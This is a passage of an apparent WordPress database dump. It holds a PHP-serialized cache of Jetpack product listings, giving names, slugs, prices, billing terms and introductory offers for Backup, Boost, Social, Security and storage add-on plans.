(1GB)\";s:12:\"product_slug\";s:24:\"jetpack_backup_t0_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-0\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$35.88\";s:21:\"combined_cost_display\";s:6:\"$35.88\";s:4:\"cost\";d:35.88000000000000255795384873636066913604736328125;s:18:\"cost_smallest_unit\";i:3588;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:25:\"jetpack_backup_t0_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2121;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1GB)\";s:12:\"product_slug\";s:25:\"jetpack_backup_t0_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-0\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$2.99\";s:21:\"combined_cost_display\";s:5:\"$2.99\";s:4:\"cost\";d:2.9900000000000002131628207280300557613372802734375;s:18:\"cost_smallest_unit\";i:299;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:19:\"jetpack_search_free\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2130;s:12:\"product_name\";s:19:\"Jetpack Search Free\";s:12:\"product_slug\";s:19:\"jetpack_search_free\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"search\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:19:\"jetpack-search-free\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:5:\"$0.00\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:8:\"one time\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:23:\"jetpack_backup_one_time\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2201;s:12:\"product_name\";s:36:\"Jetpack VaultPress Backup (One-time)\";s:12:\"product_slug\";s:23:\"jetpack_backup_one_time\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-backup-one-time\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.99\";s:21:\"combined_cost_display\";s:5:\"$0.99\";s:4:\"cost\";d:0.9899999999999999911182158029987476766109466552734375;s:18:\"cost_smallest_unit\";i:99;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:8:\"one time\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:21:\"jetpack_boost_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2400;s:12:\"product_name\";s:13:\"Jetpack Boost\";s:12:\"product_slug\";s:21:\"jetpack_boost_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:13:\"jetpack-boost\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$40.00\";s:21:\"combined_cost_display\";s:6:\"$40.00\";s:4:\"cost\";i:40;s:18:\"cost_smallest_unit\";i:4000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:20:\"jetpack_boost_yearly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2401;s:12:\"product_name\";s:13:\"Jetpack Boost\";s:12:\"product_slug\";s:20:\"jetpack_boost_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:13:\"jetpack-boost\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$240.00\";s:21:\"combined_cost_display\";s:7:\"$240.00\";s:4:\"cost\";i:240;s:18:\"cost_smallest_unit\";i:24000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:22:\"jetpack_social_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2500;s:12:\"product_name\";s:20:\"Jetpack Social Basic\";s:12:\"product_slug\";s:22:\"jetpack_social_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-social\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$12.00\";s:21:\"combined_cost_display\";s:6:\"$12.00\";s:4:\"cost\";i:12;s:18:\"cost_smallest_unit\";i:1200;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"jetpack_social_basic_yearly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2503;s:12:\"product_name\";s:20:\"Jetpack Social Basic\";s:12:\"product_slug\";s:27:\"jetpack_social_basic_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"jetpack-social-basic-yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$120.00\";s:21:\"combined_cost_display\";s:7:\"$120.00\";s:4:\"cost\";i:120;s:18:\"cost_smallest_unit\";i:12000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:5:\"month\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";i:0;s:17:\"cost_per_interval\";i:12;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}}s:28:\"jetpack_social_basic_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2504;s:12:\"product_name\";s:20:\"Jetpack Social Basic\";s:12:\"product_slug\";s:28:\"jetpack_social_basic_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"jetpack-social-basic-yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$12.00\";s:21:\"combined_cost_display\";s:6:\"$12.00\";s:4:\"cost\";i:12;s:18:\"cost_smallest_unit\";i:1200;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:30:\"jetpack_social_advanced_yearly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2602;s:12:\"product_name\";s:30:\"Jetpack Social Advanced (Beta)\";s:12:\"product_slug\";s:30:\"jetpack_social_advanced_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-social-advanced\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$180.00\";s:21:\"combined_cost_display\";s:7:\"$180.00\";s:4:\"cost\";i:180;s:18:\"cost_smallest_unit\";i:18000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:5:\"month\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";i:0;s:17:\"cost_per_interval\";i:12;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}}s:31:\"jetpack_social_advanced_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2603;s:12:\"product_name\";s:30:\"Jetpack Social Advanced (Beta)\";s:12:\"product_slug\";s:31:\"jetpack_social_advanced_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-social-advanced\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$20.00\";s:21:\"combined_cost_display\";s:6:\"$20.00\";s:4:\"cost\";i:20;s:18:\"cost_smallest_unit\";i:2000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}}'),(856,42,'my-jetpack-cache','O:8:\"stdClass\":51:{s:15:\"jetpack_premium\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2000;s:12:\"product_name\";s:15:\"Jetpack Premium\";s:12:\"product_slug\";s:15:\"jetpack_premium\";s:11:\"description\";s:53:\"Daily Backups, Automated Restores and Spam Protection\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-premium\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$99.00\";s:21:\"combined_cost_display\";s:6:\"$99.00\";s:4:\"cost\";i:99;s:18:\"cost_smallest_unit\";i:9900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:16:\"jetpack_business\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2001;s:12:\"product_name\";s:20:\"Jetpack Professional\";s:12:\"product_slug\";s:16:\"jetpack_business\";s:11:\"description\";s:68:\"Daily Backups, Security Scanning, Spam Protection, Polls and Surveys\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-business\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$299.00\";s:21:\"combined_cost_display\";s:7:\"$299.00\";s:4:\"cost\";i:299;s:18:\"cost_smallest_unit\";i:29900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:12:\"jetpack_free\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2002;s:12:\"product_name\";s:12:\"Jetpack Free\";s:12:\"product_slug\";s:12:\"jetpack_free\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:12:\"jetpack-free\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:5:\"$0.00\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:8:\"one time\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:23:\"jetpack_premium_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2003;s:12:\"product_name\";s:15:\"Jetpack Premium\";s:12:\"product_slug\";s:23:\"jetpack_premium_monthly\";s:11:\"description\";s:49:\"Daily Backups, Security Scanning, Spam Protection\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-premium\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.00\";s:21:\"combined_cost_display\";s:5:\"$9.00\";s:4:\"cost\";i:9;s:18:\"cost_smallest_unit\";i:900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_business_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2004;s:12:\"product_name\";s:20:\"Jetpack Professional\";s:12:\"product_slug\";s:24:\"jetpack_business_monthly\";s:11:\"description\";s:67:\"Daily Backups, Malware Scanning, Threat Resolution, Spam Protection\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-business\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.00\";s:21:\"combined_cost_display\";s:6:\"$29.00\";s:4:\"cost\";i:29;s:18:\"cost_smallest_unit\";i:2900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:16:\"jetpack_personal\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2005;s:12:\"product_name\";s:16:\"Jetpack Personal\";s:12:\"product_slug\";s:16:\"jetpack_personal\";s:11:\"description\";s:83:\"Daily backups, Spam protection, plus all the features you already love from Jetpack\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-personal\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$39.00\";s:21:\"combined_cost_display\";s:6:\"$39.00\";s:4:\"cost\";i:39;s:18:\"cost_smallest_unit\";i:3900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_personal_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2006;s:12:\"product_name\";s:16:\"Jetpack Personal\";s:12:\"product_slug\";s:24:\"jetpack_personal_monthly\";s:11:\"description\";s:67:\"Daily Backups, Malware Scanning, Threat Resolution, Spam Protection\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-personal\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$3.50\";s:21:\"combined_cost_display\";s:5:\"$3.50\";s:4:\"cost\";d:3.5;s:18:\"cost_smallest_unit\";i:350;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:22:\"jetpack_security_daily\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2010;s:12:\"product_name\";s:22:\"Jetpack Security Daily\";s:12:\"product_slug\";s:22:\"jetpack_security_daily\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:22:\"jetpack-security-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$299.00\";s:21:\"combined_cost_display\";s:7:\"$299.00\";s:4:\"cost\";i:299;s:18:\"cost_smallest_unit\";i:29900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:149;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}}s:30:\"jetpack_security_daily_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2011;s:12:\"product_name\";s:22:\"Jetpack Security Daily\";s:12:\"product_slug\";s:30:\"jetpack_security_daily_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:22:\"jetpack-security-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$24.95\";s:21:\"combined_cost_display\";s:6:\"$24.95\";s:4:\"cost\";d:24.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:25:\"jetpack_security_realtime\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2012;s:12:\"product_name\";s:26:\"Jetpack Security Real-time\";s:12:\"product_slug\";s:25:\"jetpack_security_realtime\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"jetpack-security-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$839.00\";s:21:\"combined_cost_display\";s:7:\"$839.00\";s:4:\"cost\";i:839;s:18:\"cost_smallest_unit\";i:83900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:419;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}}s:33:\"jetpack_security_realtime_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2013;s:12:\"product_name\";s:26:\"Jetpack Security Real-time\";s:12:\"product_slug\";s:33:\"jetpack_security_realtime_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"jetpack-security-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$69.95\";s:21:\"combined_cost_display\";s:6:\"$69.95\";s:4:\"cost\";d:69.9500000000000028421709430404007434844970703125;s:18:\"cost_smallest_unit\";i:6995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:16:\"jetpack_complete\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2014;s:12:\"product_name\";s:16:\"Jetpack Complete\";s:12:\"product_slug\";s:16:\"jetpack_complete\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-complete\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$600.00\";s:21:\"combined_cost_display\";s:7:\"$600.00\";s:4:\"cost\";i:600;s:18:\"cost_smallest_unit\";i:60000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_complete_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2015;s:12:\"product_name\";s:16:\"Jetpack Complete\";s:12:\"product_slug\";s:24:\"jetpack_complete_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-complete\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$100.00\";s:21:\"combined_cost_display\";s:7:\"$100.00\";s:4:\"cost\";i:100;s:18:\"cost_smallest_unit\";i:10000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:26:\"jetpack_security_t1_yearly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2016;s:12:\"product_name\";s:23:\"Jetpack Security (10GB)\";s:12:\"product_slug\";s:26:\"jetpack_security_t1_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$240.00\";s:21:\"combined_cost_display\";s:7:\"$240.00\";s:4:\"cost\";i:240;s:18:\"cost_smallest_unit\";i:24000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"jetpack_security_t1_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2017;s:12:\"product_name\";s:23:\"Jetpack Security (10GB)\";s:12:\"product_slug\";s:27:\"jetpack_security_t1_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$40.00\";s:21:\"combined_cost_display\";s:6:\"$40.00\";s:4:\"cost\";i:40;s:18:\"cost_smallest_unit\";i:4000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:26:\"jetpack_security_t2_yearly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2019;s:12:\"product_name\";s:22:\"Jetpack Security (1TB)\";s:12:\"product_slug\";s:26:\"jetpack_security_t2_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$822.75\";s:21:\"combined_cost_display\";s:7:\"$822.75\";s:4:\"cost\";d:899.3999999999999772626324556767940521240234375;s:18:\"cost_smallest_unit\";i:89940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:359.3999999999999772626324556767940521240234375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}}s:27:\"jetpack_security_t2_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2020;s:12:\"product_name\";s:22:\"Jetpack Security (1TB)\";s:12:\"product_slug\";s:27:\"jetpack_security_t2_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$74.95\";s:21:\"combined_cost_display\";s:6:\"$74.95\";s:4:\"cost\";d:74.9500000000000028421709430404007434844970703125;s:18:\"cost_smallest_unit\";i:7495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:41:\"jetpack_backup_addon_storage_10gb_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2040;s:12:\"product_name\";s:47:\"Jetpack VaultPress Backup Add-on Storage (10GB)\";s:12:\"product_slug\";s:41:\"jetpack_backup_addon_storage_10gb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:33:\"jetpack-backup-addon-storage-10gb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$6.00\";s:21:\"combined_cost_display\";s:5:\"$6.00\";s:4:\"cost\";i:6;s:18:\"cost_smallest_unit\";i:600;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:42:\"jetpack_backup_addon_storage_100gb_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2044;s:12:\"product_name\";s:48:\"Jetpack VaultPress Backup Add-on Storage (100GB)\";s:12:\"product_slug\";s:42:\"jetpack_backup_addon_storage_100gb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:34:\"jetpack-backup-addon-storage-100gb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$10.00\";s:21:\"combined_cost_display\";s:6:\"$10.00\";s:4:\"cost\";i:10;s:18:\"cost_smallest_unit\";i:1000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:40:\"jetpack_backup_addon_storage_1tb_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2048;s:12:\"product_name\";s:46:\"Jetpack VaultPress Backup Add-on Storage (1TB)\";s:12:\"product_slug\";s:40:\"jetpack_backup_addon_storage_1tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:32:\"jetpack-backup-addon-storage-1tb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$20.00\";s:21:\"combined_cost_display\";s:6:\"$20.00\";s:4:\"cost\";i:20;s:18:\"cost_smallest_unit\";i:2000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:40:\"jetpack_backup_addon_storage_3tb_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2052;s:12:\"product_name\";s:46:\"Jetpack VaultPress Backup Add-on Storage (3TB)\";s:12:\"product_slug\";s:40:\"jetpack_backup_addon_storage_3tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:32:\"jetpack-backup-addon-storage-3tb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$20.00\";s:21:\"combined_cost_display\";s:6:\"$20.00\";s:4:\"cost\";i:20;s:18:\"cost_smallest_unit\";i:2000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:40:\"jetpack_backup_addon_storage_5tb_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2056;s:12:\"product_name\";s:46:\"Jetpack VaultPress Backup Add-on Storage 